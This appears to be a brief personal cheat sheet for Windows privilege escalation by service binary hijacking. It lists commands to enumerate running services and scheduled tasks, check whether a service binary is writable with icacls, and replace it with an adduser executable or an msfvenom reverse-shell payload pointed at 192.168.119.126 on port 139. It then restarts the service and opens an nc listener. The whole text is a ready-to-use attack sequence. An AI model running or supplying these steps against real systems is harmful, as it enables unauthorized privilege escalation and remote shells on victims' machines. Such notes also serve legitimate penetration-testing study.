Service Binary hijacking

check programs on scheduled tasks
- schtasks /query /fo LIST /v
- Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Check permission (full or writable) of programs found
- icacls <full-path>
- icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

transfer any adduser.exe executable and rename it with exploitable exe name
- OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe

sc.exe stop <service-name>

sc.exe start <service-name>

nc -nvlp 139 if reverse shell exe is used